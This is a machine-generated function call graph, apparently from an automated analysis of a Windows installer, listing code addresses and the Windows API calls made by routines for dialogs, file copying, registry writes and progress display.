4059ac 4385->4387 4386->4387 4387->4362 4389 4067e8 GetProcAddress 4388->4389 4390 4067de 4388->4390 4392 4059c0 4389->4392 4394 406752 GetSystemDirectoryW 4390->4394 4392->4362 4393 4067e4 4393->4389 4393->4392 4395 406774 wsprintfW LoadLibraryExW 4394->4395 4395->4393 4397 6f972993 4398 6f9729e3 4397->4398 4399 6f9729a3 VirtualProtect 4397->4399 4399->4398 4400 4053c4 4401 4053d4 4400->4401 4402 4053e8 4400->4402 4403 405431 4401->4403 4404 4053da 4401->4404 4405 4053f0 IsWindowVisible 4402->4405 4412 405410 4402->4412 4406 405436 CallWindowProcW 4403->4406 4414 4043ab 4404->4414 4405->4403 4408 4053fd 4405->4408 4409 4053e4 4406->4409 4417 404d1a SendMessageW 4408->4417 4412->4406 4422 404d9a 4412->4422 4415 4043c3 4414->4415 4416 4043b4 SendMessageW 4414->4416 4415->4409 4416->4415 4418 404d79 SendMessageW 4417->4418 4419 404d3d GetMessagePos ScreenToClient SendMessageW 4417->4419 4420 404d71 4418->4420 4419->4420 4421 404d76 4419->4421 4420->4412 4421->4418 4431 4063e8 lstrcpynW 4422->4431 4424 404dad 4432 40632f wsprintfW 4424->4432 4426 404db7 4433 40140b 4426->4433 4430 404dc7 4430->4403 4431->4424 4432->4426 4437 401389 4433->4437 4436 4063e8 lstrcpynW 4436->4430 4439 401390 4437->4439 4438 4013fe 4438->4436 4439->4438 4440 4013cb MulDiv SendMessageW 4439->4440 4440->4439 4885 401e49 4886 402c1f 17 API calls 4885->4886 4887 401e4f 4886->4887 4888 402c1f 17 API calls 4887->4888 4889 401e5b 4888->4889 4890 401e72 EnableWindow 4889->4890 4891 401e67 ShowWindow 4889->4891 4892 402ac5 4890->4892 4891->4892 4893 40264a 4894 402c1f 17 API calls 4893->4894 4896 402659 4894->4896 4895 402796 4896->4895 4897 4026a3 ReadFile 4896->4897 4898 40273c 4896->4898 4899 405f61 ReadFile 4896->4899 4901 4026e3 MultiByteToWideChar 4896->4901 4902 402798 4896->4902 4904 402709 SetFilePointer MultiByteToWideChar 4896->4904 4905 4027a9 4896->4905 4897->4895 4897->4896 4898->4895 4898->4896 4907 405fbf SetFilePointer 4898->4907 4899->4896 4901->4896 4916 40632f wsprintfW 4902->4916 4904->4896 4905->4895 4906 4027ca SetFilePointer 4905->4906 4906->4895 4908 405fdb 4907->4908 4915 405ff3 4907->4915 4909 405f61 ReadFile 4908->4909 4910 405fe7 4909->4910 4911 406024 SetFilePointer 4910->4911 4912 405ffc SetFilePointer 4910->4912 4910->4915 4911->4915 4912->4911 4913 406007 4912->4913 4914 405f90 WriteFile 4913->4914 4914->4915 4915->4898 4916->4895 4917 404dcc GetDlgItem GetDlgItem 4918 404e1e 7 API calls 4917->4918 4926 405037 4917->4926 4919 404ec1 DeleteObject 4918->4919 4920 404eb4 SendMessageW 4918->4920 4921 404eca 4919->4921 4920->4919 4923 404ed9 4921->4923 4924 404f01 4921->4924 4922 40511b 4929 4051c7 4922->4929 4935 4053af 4922->4935 4940 405174 SendMessageW 4922->4940 4925 40640a 17 API calls 4923->4925 4928 40435f 18 API calls 4924->4928 4930 404ee3 SendMessageW SendMessageW 4925->4930 4926->4922 4927 4050fc 4926->4927 4933 405097 4926->4933 4927->4922 4937 40510d SendMessageW 4927->4937 4934 404f15 4928->4934 4931 4051d1 SendMessageW 4929->4931 4932 4051d9 4929->4932 4930->4921 4931->4932 4942 4051f2 4932->4942 4943 4051eb ImageList_Destroy 4932->4943 4951 405202 4932->4951 4938 404d1a 5 API calls 4933->4938 4939 40435f 18 API calls 4934->4939 4936 4043c6 8 API calls 4935->4936 4941 4053bd 4936->4941 4937->4922 4954 4050a8 4938->4954 4955 404f23 4939->4955 4940->4935 4945 405189 SendMessageW 4940->4945 4946 4051fb GlobalFree 4942->4946 4942->4951 4943->4942 4944 405371 4944->4935 4949 405383 ShowWindow GetDlgItem ShowWindow 4944->4949 4948 40519c 4945->4948 4946->4951 4947 404ff8 GetWindowLongW SetWindowLongW 4950 405011 4947->4950 4956 4051ad SendMessageW 4948->4956 4949->4935 4952 405017 ShowWindow 4950->4952 4953 40502f 4950->4953 4951->4944 4963 404d9a 4 API calls 4951->4963 4966 40523d 4951->4966 4973 404394 SendMessageW 4952->4973 4974 404394 SendMessageW 4953->4974 4954->4927 4955->4947 4957 404ff2 4955->4957 4960 404f73 SendMessageW 4955->4960 4961 404fc0 SendMessageW 4955->4961 4962 404faf SendMessageW 4955->4962 4956->4929 4957->4947 4957->4950 4960->4955 4961->4955 4962->4955 4963->4966 4964 40502a 4964->4935 4965 405347 InvalidateRect 4965->4944 4967 40535d 4965->4967 4968 405281 4966->4968 4969 40526b SendMessageW 4966->4969 4975 404cd5 4967->4975 4968->4965 4970 4052e2 4968->4970 4972 4052f5 SendMessageW SendMessageW 4968->4972 4969->4968 4970->4972 4972->4968 4973->4964 4974->4926 4978 404c0c 4975->4978 4977 404cea 4977->4944 4979 404c25 4978->4979 4980 40640a 17 API calls 4979->4980 4981 404c89 4980->4981 4982 40640a 17 API calls 4981->4982 4983 404c94 4982->4983 4984 40640a 17 API calls 4983->4984 4985 404caa lstrlenW wsprintfW SetDlgItemTextW 4984->4985 4985->4977 5314 4016cc 5315 402c41 17 API calls 5314->5315 5316 4016d2 GetFullPathNameW 5315->5316 5317 4016ec 5316->5317 5318 40170e 5316->5318 5317->5318 5321 40672b 2 API calls 5317->5321 5319 401723 GetShortPathNameW 5318->5319 5320 402ac5 5318->5320 5319->5320 5322 4016fe 5321->5322 5322->5318 5324 4063e8 lstrcpynW 5322->5324 5324->5318 5325 40234e 5326 402c41 17 API calls 5325->5326 5327 40235d 5326->5327 5328 402c41 17 API calls 5327->5328 5329 402366 5328->5329 5330 402c41 17 API calls 5329->5330 5331 402370 GetPrivateProfileStringW 5330->5331 5332 4044cf lstrlenW 5333 4044f0 WideCharToMultiByte 5332->5333 5334 4044ee 5332->5334 5334->5333 5335 404850 5336 40487c 5335->5336 5337 40488d 5335->5337 5396 405a32 GetDlgItemTextW 5336->5396 5338 404899 GetDlgItem 5337->5338 5345 4048f8 5337->5345 5341 4048ad 5338->5341 5340 404887 5343 40667c 5 API calls 5340->5343 5344 4048c1 SetWindowTextW 5341->5344 5348 405d68 4 API calls 5341->5348 5342 4049dc 5393 404b8b 5342->5393 5398 405a32 GetDlgItemTextW 5342->5398 5343->5337 5349 40435f 18 API calls 5344->5349 5345->5342 5350 40640a 17 API calls 5345->5350 5345->5393 5347 4043c6 8 API calls 5352 404b9f 5347->5352 5353 4048b7 5348->5353 5354 4048dd 5349->5354 5355 40496c SHBrowseForFolderW 5350->5355 5351 404a0c 5356 405dc5 18 API calls 5351->5356 5353->5344 5360 405cbd 3 API calls 5353->5360 5357 40435f 18 API calls 5354->5357 5355->5342 5358 404984 CoTaskMemFree 5355->5358 5359 404a12 5356->5359 5361 4048eb 5357->5361 5362 405cbd 3 API calls 5358->5362 5399 4063e8 lstrcpynW 5359->5399 5360->5344 5397 404394 SendMessageW 5361->5397 5364 404991 5362->5364 5367 4049c8 SetDlgItemTextW 5364->5367 5371 40640a 17 API calls 5364->5371 5366 4048f1 5369 4067c2 5 API calls 5366->5369 5367->5342 5368 404a29 5370 4067c2 5 API calls 5368->5370 5369->5345 5378 404a30 5370->5378 5372 4049b0 lstrcmpiW 5371->5372 5372->5367 5374 4049c1 lstrcatW 5372->5374 5373 404a71 5400 4063e8 lstrcpynW 5373->5400 5374->5367 5376 404a78 5377 405d68 4 API calls 5376->5377 5379 404a7e GetDiskFreeSpaceW 5377->5379 5378->5373 5382 405d09 2 API calls 5378->5382 5383 404ac9 5378->5383 5381 404aa2 MulDiv 5379->5381 5379->5383 5381->5383 5382->5378 5384 404cd5 20 API calls 5383->5384 5394 404b3a 5383->5394 5386 404b27 5384->5386 5385 404b5d 5401 404381 EnableWindow 5385->5401 5388 404b3c SetDlgItemTextW 5386->5388 5389 404b2c 5386->5389 5387 40140b 2 API calls 5387->5385 5388->5394 5391 404c0c 20 API calls 5389->5391 5391->5394 5392 404b79 5392->5393 5402 4047a9 5392->5402 5393->5347 5394->5385 5394->5387 5396->5340 5397->5366 5398->5351 5399->5368 5400->5376 5401->5392 5403 4047b7 5402->5403 5404 4047bc SendMessageW 5402->5404 5403->5404 5404->5393 5405 401b53 5406 402c41 17 API calls 5405->5406 5407 401b5a 5406->5407 5408 402c1f 17 API calls 5407->5408 5409 401b63 wsprintfW 5408->5409 5410 402ac5 5409->5410 5411 401956 5412 402c41 17 API calls 5411->5412 5413 40195d lstrlenW 5412->5413 5414 402592 5413->5414 5422 4014d7 5423 402c1f 17 API calls 5422->5423 5424 4014dd Sleep 5423->5424 5426 402ac5 5424->5426 5427 6f971000 5430 6f97101b 5427->5430 5437 6f971516 5430->5437 5432 6f971020 5433 6f971027 GlobalAlloc 5432->5433 5434 6f971024 5432->5434 5433->5434 5435 6f97153d 3 API calls 5434->5435 5436 6f971019 5435->5436 5439 6f97151c 5437->5439 5438 6f971522 5438->5432 5439->5438 5440 6f97152e GlobalFree 5439->5440 5440->5432 5441 401f58 5442 402c41 17 API calls 5441->5442 5443 401f5f 5442->5443 5444 40672b 2 API calls 5443->5444 5445 401f65 5444->5445 5446 401f76 5445->5446 5448 40632f wsprintfW 5445->5448 5448->5446 5449 402259 5450 402c41 17 API calls 5449->5450 5451 40225f 5450->5451 5452 402c41 17 API calls 5451->5452 5453 402268 5452->5453 5454 402c41 17 API calls 5453->5454 5455 402271 5454->5455 5456 40672b 2 API calls 5455->5456 5457 40227a 5456->5457 5458 40228b lstrlenW lstrlenW 5457->5458 5463 40227e 5457->5463 5460 405450 24 API calls 5458->5460 5459 405450 24 API calls 5461 402286 5459->5461 5462 4022c9 SHFileOperationW 5460->5462 5462->5461 5462->5463 5463->5459 5305 40175c 5306 402c41 17 API calls 5305->5306 5307 401763 5306->5307 5308 405f0d 2 API calls 5307->5308 5309 40176a 5308->5309 5310 405f0d 2 API calls 5309->5310 5310->5309 5464 401d5d GetDlgItem GetClientRect 5465 402c41 17 API calls 5464->5465 5466 401d8f LoadImageW SendMessageW 5465->5466 5467 402ac5 5466->5467 5468 401dad DeleteObject 5466->5468 5468->5467 5469 4022dd 5470 4022f7 5469->5470 5471 4022e4 5469->5471 5472 40640a 17 API calls 5471->5472 5473 4022f1 5472->5473 5474 405a4e MessageBoxIndirectW 5473->5474 5474->5470 5475 401563 5476 402a6b 5475->5476 5479 40632f wsprintfW 5476->5479 5478 402a70 5479->5478 4441 4023e4 4442 402c41 17 API calls 4441->4442 4443 4023f6 4442->4443 4444 402c41 17 API calls 4443->4444 4445 402400 4444->4445 4458 402cd1 4445->4458 4448 402438 4451 402444 4448->4451 4462 402c1f 4448->4462 4449 40288b 4450 402c41 17 API calls 4452 40242e lstrlenW 4450->4452 4454 402463 RegSetValueExW 4451->4454 4465 4031d6 4451->4465 4452->4448 4456 402479 RegCloseKey 4454->4456 4456->4449 4459 402cec 4458->4459 4480 406283 4459->4480 4463 40640a 17 API calls 4462->4463 4464 402c34 4463->4464 4464->4451 4466 403201 4465->4466 4467 4031e5 SetFilePointer 4465->4467 4484 4032de GetTickCount 4466->4484 4467->4466 4470 40329e 4470->4454 4471 405f61 ReadFile 4472 403221 4471->4472 4472->4470 4473 4032de 42 API calls 4472->4473 4474 403238 4473->4474 4474->4470 4475 4032a4 ReadFile 4474->4475 4477 403247 4474->4477 4475->4470 4477->4470 4478 405f61 ReadFile 4477->4478 4479 405f90 WriteFile 4477->4479 4478->4477 4479->4477 4481 406292 4480->4481 4482 402410 4481->4482 4483 40629d RegCreateKeyExW 4481->4483 4482->4448 4482->4449 4482->4450 4483->4482 4485 403436 4484->4485 4486 40330c 4484->4486 4487 402e8e 32 API calls 4485->4487 4497 40345d SetFilePointer 4486->4497 4493 403208 4487->4493 4489 403317 SetFilePointer 4495 40333c 4489->4495 4493->4470 4493->4471 4494 405f90 WriteFile 4494->4495 4495->4493 4495->4494 4496 403417 SetFilePointer 4495->4496 4498 403447 4495->4498 4501 406943 4495->4501 4508 402e8e 4495->4508 4496->4485 4497->4489 4499 405f61 ReadFile 4498->4499 4500 40345a 4499->4500 4500->4495 4502 406968 4501->4502 4503 406970 4501->4503 4502->4495 4503->4502 4504 406a00 GlobalAlloc 4503->4504 4505 4069f7 GlobalFree 4503->4505 4506 406a77 GlobalAlloc 4503->4506 4507 406a6e GlobalFree 4503->4507 4504->4502 4504->4503 4505->4504 4506->4502 4506->4503 4507->4506 4509 402eb7 4508->4509 4510 402e9f 4508->4510 4513 402ec7 GetTickCount 4509->4513 4514 402ebf 4509->4514 4511 402ea8 DestroyWindow 4510->4511 4512 402eaf 4510->4512 4511->4512 4512->4495 4513->4512 4516 402ed5 4513->4516 4523 4067fe 4514->4523 4517 402f0a CreateDialogParamW ShowWindow 4516->4517 4518 402edd 4516->4518 4517->4512 4518->4512 4527 402e72 4518->4527 4520 402eeb wsprintfW 4521 405450 24 API calls 4520->4521 4522 402f08 4521->4522 4522->4512 4524 40681b PeekMessageW 4523->4524 4525 406811 DispatchMessageW 4524->4525 4526 40682b 4524->4526 4525->4524 4526->4512 4528 402e81 4527->4528 4529 402e83 MulDiv 4527->4529 4528->4529 4529->4520 5487 402868 5488 402c41 17 API calls 5487->5488 5489 40286f FindFirstFileW 5488->5489 5490 402897 5489->5490 5493 402882 5489->5493 5495 40632f wsprintfW 5490->5495 5492 4028a0 5496 4063e8 lstrcpynW 5492->5496 5495->5492 5496->5493 5497 401968 5498 402c1f 17 API calls 5497->5498 5499 40196f 5498->5499 5500 402c1f 17 API calls 5499->5500 5501 40197c 5500->5501 5502 402c41 17 API calls 5501->5502 5503 401993 lstrlenW 5502->5503 5505 4019a4 5503->5505 5504 4019e5 5505->5504 5509 4063e8 lstrcpynW 5505->5509 5507 4019d5 5507->5504 5508 4019da lstrlenW 5507->5508 5508->5504 5509->5507 5510 40166a 5511 402c41 17 API calls 5510->5511 5512 401670 5511->5512 5513 40672b 2 API calls 5512->5513 5514 401676 5513->5514 5515 6f97103d 5516 6f97101b 5 API calls 5515->5516 5517 6f971056 5516->5517 5015 40176f 5016 402c41 17 API calls 5015->5016 5017 401776 5016->5017 5018 401796 5017->5018 5019 40179e 5017->5019 5055 4063e8 lstrcpynW 5018->5055 5056 4063e8 lstrcpynW 5019->5056 5022 4017a9 5024 405cbd 3 API calls 5022->5024 5023 40179c 5026 40667c 5 API calls 5023->5026 5025 4017af lstrcatW 5024->5025 5025->5023 5039 4017bb 5026->5039 5027 40672b 2 API calls 5027->5039 5028 4017f7 5030 405eb9 2 API calls 5028->5030 5030->5039 5031 4017cd CompareFileTime 5031->5039 5032 40188d 5033 405450 24 API calls 5032->5033 5036 401897 5033->5036 5034 405450 24 API calls 5044 401879 5034->5044 5035 4063e8 lstrcpynW 5035->5039 5037 4031d6 44 API calls 5036->5037 5038 4018aa 5037->5038 5040 4018be SetFileTime 5038->5040 5042 4018d0 CloseHandle 5038->5042 5039->5027 5039->5028 5039->5031 5039->5032 5039->5035 5041 40640a 17 API calls 5039->5041 5051 405a4e MessageBoxIndirectW 5039->5051 5053 401864 5039->5053 5054 405ede GetFileAttributesW CreateFileW 5039->5054 5040->5042 5041->5039 5043 4018e1 5042->5043 5042->5044 5045 4018e6 5043->5045 5046 4018f9 5043->5046 5047 40640a 17 API calls 5045->5047 5048 40640a 17 API calls 5046->5048 5049 4018ee lstrcatW 5047->5049 5050 401901 5048->5050 5049->5050 5052 405a4e MessageBoxIndirectW 5050->5052 5051->5039 5052->5044 5053->5034 5053->5044 5054->5039 5055->5023 5056->5022 5057 4027ef 5058 4027f6 5057->5058 5061 402a70 5057->5061 5059 402c1f 17 API calls 5058->5059 5060 4027fd 5059->5060 5062 40280c SetFilePointer 5060->5062 5062->5061 5063 40281c 5062->5063 5065 40632f wsprintfW 5063->5065 5065->5061 5518 401a72 5519 402c1f 17 API calls 5518->5519 5520 401a7b 5519->5520 5521 402c1f 17 API calls 5520->5521 5522 401a20 5521->5522 5523 406af2 5524 406976 5523->5524 5525 4072e1 5524->5525 5526 406a00 GlobalAlloc 5524->5526 5527 4069f7 GlobalFree 5524->5527 5528 406a77 GlobalAlloc 5524->5528 5529 406a6e GlobalFree 5524->5529 5526->5524 5526->5525 5527->5526 5528->5524 5528->5525 5529->5528 5530 401573 5531 401583 ShowWindow 5530->5531 5532 40158c 5530->5532 5531->5532 5533 402ac5 5532->5533 5534 40159a ShowWindow 5532->5534 5534->5533 5535 401cf3 5536 402c1f 17 API calls 5535->5536 5537 401cf9 IsWindow 5536->5537 5538 401a20 5537->5538 5539 402df3 5540 402e05 SetTimer 5539->5540 5541 402e1e 5539->5541 5540->5541 5542 402e6c 5541->5542 5543 402e72 MulDiv 5541->5543 5544 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 5543->5544 5544->5542 5546 4014f5 SetForegroundWindow 5547 402ac5 5546->5547 5548 402576 5549 402c41 17 API calls 5548->5549 5550 40257d 5549->5550 5553 405ede GetFileAttributesW CreateFileW 5550->5553 5552 402589 5553->5552 5257 401b77 5258 401bc8 5257->5258 5260 401b84 5257->5260 5261 401bf2 GlobalAlloc 5258->5261 5262 401bcd 5258->5262 5259 401c0d 5264 40640a 17 API calls 5259->5264 5272 4022f7 5259->5272 5260->5259 5266 401b9b 5260->5266 5263 40640a 17 API calls 5261->5263 5262->5272 5278 4063e8 lstrcpynW 5262->5278 5263->5259 5265 4022f1 5264->5265 5270 405a4e MessageBoxIndirectW 5265->5270 5276 4063e8 lstrcpynW 5266->5276 5269 401bdf GlobalFree 5269->5272 5270->5272 5271 401baa 5277 4063e8 lstrcpynW 5271->5277 5274 401bb9 5279 4063e8 lstrcpynW 5274->5279 5276->5271 5277->5274 5278->5269 5279->5272 5280 4024f8 5281 402c81 17 API calls 5280->5281 5282 402502 5281->5282 5283 402c1f 17 API calls 5282->5283 5284 40250b 5283->5284 5285 402533 RegEnumValueW 5284->5285 5286 402527 RegEnumKeyW 5284->5286 5288 40288b 5284->5288 5287 402548 5285->5287 5289 40254f RegCloseKey 5285->5289 5286->5289 5287->5289 5289->5288 5291 40167b 5292 402c41 17 API calls 5291->5292 5293 401682 5292->5293 5294 402c41 17 API calls 5293->5294 5295 40168b 5294->5295 5296 402c41 17 API calls 5295->5296 5297 401694 MoveFileW 5296->5297 5298 4016a7 5297->5298 5304 4016a0 5297->5304 5299 40672b 2 API calls 5298->5299 5301 402250 5298->5301 5302 4016b6 5299->5302 5300 401423 24 API calls 5300->5301 5302->5301 5303 4061ae 36 API calls 5302->5303 5303->5304 5304->5300 5561 401e7d 5562 402c41 17 API calls 5561->5562 5563 401e83 5562->5563 5564 402c41 17 API calls 5563->5564 5565 401e8c 5564->5565 5566 402c41 17 API calls 5565->5566 5567 401e95 5566->5567 5568 402c41 17 API calls 5567->5568 5569 401e9e 5568->5569 5570 401423 24 API calls 5569->5570 5571 401ea5 5570->5571 5578 405a14 ShellExecuteExW 5571->5578 5573 401ee7 5576 40288b 5573->5576 5579 406873 WaitForSingleObject 5573->5579 5575 401f01 CloseHandle 5575->5576 5578->5573 5580 40688d 5579->5580 5581 40689f GetExitCodeProcess 5580->5581 5582 4067fe 2 API calls 5580->5582 5581->5575 5583 406894 WaitForSingleObject 5582->5583 5583->5580 5584 4019ff 5585 402c41 17 API calls 5584->5585 5586 401a06 5585->5586 5587 402c41 17 API calls 5586->5587 5588 401a0f 5587->5588 5589 401a16 lstrcmpiW 5588->5589 5590 401a28 lstrcmpW 5588->5590 5591 401a1c 5589->5591 5590->5591 5592 401000 5593 401037 BeginPaint GetClientRect 5592->5593 5594 40100c DefWindowProcW 5592->5594 5596 4010f3 5593->5596 5597 401179 5594->5597 5598 401073 CreateBrushIndirect FillRect DeleteObject 5596->5598 5599 4010fc 5596->5599 5598->5596 5600 401102 CreateFontIndirectW 5599->5600 5601 401167 EndPaint 5599->5601 5600->5601 5602 401112 6 API calls 5600->5602 5601->5597 5602->5601 5603 6f972c57 5604 6f972c6f 5603->5604 5605 6f97158f 2 API calls 5604->5605 5606 6f972c8a 5605->5606 5607 6f9716d4 5608 6f971703 5607->5608 5609 6f971b5f 22 API calls 5608->5609 5610 6f97170a 5609->5610 5611 6f971711 5610->5611 5612 6f97171d 5610->5612 5613 6f971272 2 API calls 5611->5613 5614 6f971727 5612->5614 5615 6f971744 5612->5615 5618 6f97171b 5613->5618 5619 6f97153d 3 API calls 5614->5619 5616 6f97176e 5615->5616 5617 6f97174a 5615->5617 5621 6f97153d 3 API calls 5616->5621 5620 6f9715b4 3 API calls 5617->5620 5622 6f97172c 5619->5622 5623 6f97174f 5620->5623 5621->5618 5624 6f9715b4 3 API calls 5622->5624 5625 6f971272 2 API calls 5623->5625 5626 6f971732 5624->5626 5627 6f971755 GlobalFree 5625->5627 5628 6f971272 2 API calls 5626->5628 5627->5618 5630 6f971769 GlobalFree 5627->5630 5629 6f971738 GlobalFree 5628->5629 5629->5618 5630->5618 5631 401503 5632 40150b 5631->5632 5634 40151e 5631->5634 5633 402c1f 17 API calls 5632->5633 5633->5634 4530 402484 4541 402c81 4530->4541 4533 402c41 17 API calls 4534 402497 4533->4534 4535 4024a2 RegQueryValueExW 4534->4535 4537 40288b 4534->4537 4536 4024c2 4535->4536 4538 4024c8 RegCloseKey 4535->4538 4536->4538 4546 40632f wsprintfW 4536->4546 4538->4537 4542 402c41 17 API calls 4541->4542 4543 402c98 4542->4543 4544 406255 RegOpenKeyExW 4543->4544 4545 40248e 4544->4545 4545->4533 4546->4538 5635 402104 5636 402c41 17 API calls 5635->5636 5637 40210b 5636->5637 5638 402c41 17 API calls 5637->5638 5639 402115 5638->5639 5640 402c41 17 API calls 5639->5640 5641 40211f 5640->5641 5642 402c41 17 API calls 5641->5642 5643 402129 5642->5643 5644 402c41 17 API calls 5643->5644 5646 402133 5644->5646 5645 402172 CoCreateInstance 5650 402191 5645->5650 5646->5645 5647 402c41 17 API calls 5646->5647 5647->5645 5648 401423 24 API calls 5649 402250 5648->5649 5650->5648 5650->5649 4790 403e86 4791 403fd9 4790->4791 4792 403e9e 4790->4792 4794 403fea GetDlgItem GetDlgItem 4791->4794 4809 40402a 4791->4809 4792->4791 4793 403eaa 4792->4793 4795 403eb5 SetWindowPos 4793->4795 4796 403ec8 4793->4796 4797 40435f 18 API calls 4794->4797 4795->4796 4799 403ee5 4796->4799 4800 403ecd ShowWindow 4796->4800 4801 404014 SetClassLongW 4797->4801 4798 4043ab SendMessageW 4831 404096 4798->4831 4804 403f07 4799->4804 4805 403eed DestroyWindow 4799->4805 4800->4799 4806 40140b 2 API calls 4801->4806 4802 404084 4802->4798 4803 403fd4 4802->4803 4810 403f0c SetWindowLongW 4804->4810 4811 403f1d 4804->4811 4808 404309 4805->4808 4806->4809 4807 401389 2 API calls 4812 40405c 4807->4812 4808->4803 4819 404319 ShowWindow 4808->4819 4809->4802 4809->4807 4810->4803 4816 403fc6 4811->4816 4817 403f29 GetDlgItem 4811->4817 4812->4802 4813 404060 SendMessageW 4812->4813 4813->4803 4814 40140b 2 API calls 4814->4831 4815 4042ea DestroyWindow EndDialog 4815->4808 4871 4043c6 4816->4871 4820 403f59 4817->4820 4821 403f3c SendMessageW IsWindowEnabled 4817->4821 4819->4803 4823 403f66 4820->4823 4824 403fad SendMessageW 4820->4824 4825 403f79 4820->4825 4834 403f5e 4820->4834 4821->4803 4821->4820 4822 40640a 17 API calls 4822->4831 4823->4824 4823->4834 4824->4816 4828 403f81 4825->4828 4829 403f96 4825->4829 4827 40435f 18 API calls 4827->4831 4832 40140b 2 API calls 4828->4832 4833 40140b 2 API calls 4829->4833 4830 403f94 4830->4816 4831->4803 4831->4814 4831->4815 4831->4822 4831->4827 4852 40422a DestroyWindow 4831->4852 4862 40435f 4831->4862 4832->4834 4835 403f9d 4833->4835 4868 404338 4834->4868 4835->4816 4835->4834 4837 404111 GetDlgItem 4838 404126 4837->4838 4839 40412e ShowWindow KiUserCallbackDispatcher 4837->4839 4838->4839 4865 404381 EnableWindow 4839->4865 4841 404158 EnableWindow 4846 40416c 4841->4846 4842 404171 GetSystemMenu EnableMenuItem SendMessageW 4843 4041a1 SendMessageW 4842->4843 4842->4846 4843->4846 4845 403e67 18 API calls 4845->4846 4846->4842 4846->4845 4866 404394 SendMessageW 4846->4866 4867 4063e8 lstrcpynW 4846->4867 4848 4041d0 lstrlenW 4849 40640a 17 API calls 4848->4849 4850 4041e6 SetWindowTextW 4849->4850 4851 401389 2 API calls 4850->4851 4851->4831 4852->4808 4853 404244 CreateDialogParamW 4852->4853 4853->4808 4854 404277 4853->4854 4855 40435f 18 API calls 4854->4855 4856 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4855->4856 4857 401389 2 API calls 4856->4857 4858 4042c8 4857->4858 4858->4803 4859 4042d0 ShowWindow 4858->4859 4860 4043ab SendMessageW 4859->4860 4861 4042e8 4860->4861 4861->4808 4863 40640a 17 API calls 4862->4863 4864 40436a SetDlgItemTextW 4863->4864 4864->4837 4865->4841 4866->4846 4867->4848 4869 404345 SendMessageW 4868->4869 4870 40433f 4868->4870 4869->4830 4870->4869 4872 404489 4871->4872 4873 4043de GetWindowLongW 4871->4873 4872->4803 4873->4872 4874 4043f3 4873->4874 4874->4872 4875 404420 GetSysColor 4874->4875 4876 404423 4874->4876 4875->4876 4877 404433 SetBkMode 4876->4877 4878 404429 SetTextColor 4876->4878 4879 404451 4877->4879 4880 40444b GetSysColor 4877->4880 4878->4877 4881 404462 4879->4881 4882 404458 SetBkColor 4879->4882 4880->4879 4881->4872 4883 404475 DeleteObject 4881->4883 4884 40447c CreateBrushIndirect 4881->4884 4882->4881 4883->4884 4884->4872 5651 401f06 5652 402c41 17 API calls 5651->5652 5653 401f0c 5652->5653 5654 405450 24 API calls 5653->5654 5655 401f16 5654->5655 5656 4059d1 2 API calls 5655->5656 5657 401f1c 5656->5657 5658 401f3f CloseHandle 5657->5658 5660 40288b 5657->5660 5661 406873 5 API calls 5657->5661 5658->5660 5662 401f31 5661->5662 5662->5658 5664 40632f wsprintfW 5662->5664 5664->5658 5665 404809 5666 404819 5665->5666 5667 40483f 5665->5667 5668 40435f 18 API calls 5666->5668 5669 4043c6 8 API calls 5667->5669 5670 404826 SetDlgItemTextW 5668->5670 5671 40484b 5669->5671 5670->5667 5672 40190c 5673 401943 5672->5673 5674 402c41 17 API calls 5673->5674 5675 401948 5674->5675 5676 405afa 67 API calls 5675->5676 5677 401951 5676->5677 5678 40230c 5679 402314 5678->5679 5681 40231a 5678->5681 5680 402c41 17 API calls 5679->5680 5680->5681 5682 402c41 17 API calls 5681->5682 5683 402328 5681->5683 5682->5683 5684 402c41 17 API calls 5683->5684 5686 402336 5683->5686 5684->5686 5685 402c41 17 API calls 5687 40233f WritePrivateProfileStringW 5685->5687 5686->5685 5688 401f8c 5689 402c41 17 API calls 5688->5689 5690 401f93 5689->5690 5691 4067c2 5 API calls 5690->5691 5692 401fa2 5691->5692 5693 401fbe GlobalAlloc 5692->5693 5702 402026 5692->5702 5694 401fd2 5693->5694 5693->5702 5695 4067c2 5 API calls 5694->5695 5696 401fd9 5695->5696 5697 4067c2 5 API calls 5696->5697 5698 401fe3 5697->5698 5698->5702 5703 40632f wsprintfW 5698->5703 5700 402018 5704 40632f wsprintfW 5700->5704 5703->5700 5704->5702 4986 40238e 4987 4023c1 4986->4987 4988 402396 4986->4988 4989 402c41 17 API calls 4987->4989 4990 402c81 17 API calls 4988->4990 4991 4023c8 4989->4991 4992 40239d 4990->4992 4998 402cff 4991->4998 4994 4023a7 4992->4994 4997 4023d5 4992->4997 4995 402c41 17 API calls 4994->4995 4996 4023ae RegDeleteValueW RegCloseKey 4995->4996 4996->4997 4999 402d0c 4998->4999 5000 402d13 4998->5000 4999->4997 5000->4999 5002 402d44 5000->5002 5003 406255 RegOpenKeyExW 5002->5003 5004 402d72 5003->5004 5005 402d76 5004->5005 5006 402dec 5004->5006 5007 402d98 RegEnumKeyW 5005->5007 5008 402daf RegCloseKey 5005->5008 5009 402dd0 RegCloseKey 5005->5009 5011 402d44 6 API calls 5005->5011 5006->4999 5007->5005 5007->5008 5010 4067c2 5 API calls 5008->5010 5009->5006 5012 402dbf 5010->5012 5011->5005 5013 402de0 RegDeleteKeyW 5012->5013 5014 402dc3 5012->5014 5013->5006 5014->5006 5705 6f9718d9 5707 6f9718fc 5705->5707 5706 6f971943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5709 6f971272 2 API calls 5706->5709 5707->5706 5708 6f971931 GlobalFree 5707->5708 5708->5706 5710 6f971ace GlobalFree GlobalFree 5709->5710 5711 40190f 5712 402c41 17 API calls 5711->5712 5713 401916 5712->5713 5714 405a4e MessageBoxIndirectW 5713->5714 5715 40191f 5714->5715 5716 6f971058 5718 6f971074 5716->5718 5717 6f9710dd 5718->5717 5719 6f971516 GlobalFree 5718->5719 5720 6f971092 5718->5720 5719->5720 5721 6f971516 GlobalFree 5720->5721 5722 6f9710a2 5721->5722 5723 6f9710b2 5722->5723 5724 6f9710a9 GlobalSize 5722->5724 5725 6f9710b6 GlobalAlloc 5723->5725 5726 6f9710c7 5723->5726 5724->5723 5727 6f97153d 3 API calls 5725->5727 5728 6f9710d2 GlobalFree 5726->5728 5727->5726 5728->5717 5729 40558f 5730 4055b0 GetDlgItem GetDlgItem GetDlgItem 5729->5730 5731 405739 5729->5731 5774 404394 SendMessageW 5730->5774 5733 405742 GetDlgItem CreateThread CloseHandle 5731->5733 5736 40576a 5731->5736 5733->5736 5734 405620 5740 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5734->5740 5735 405795 5739 4057f5 5735->5739 5742 4057a9 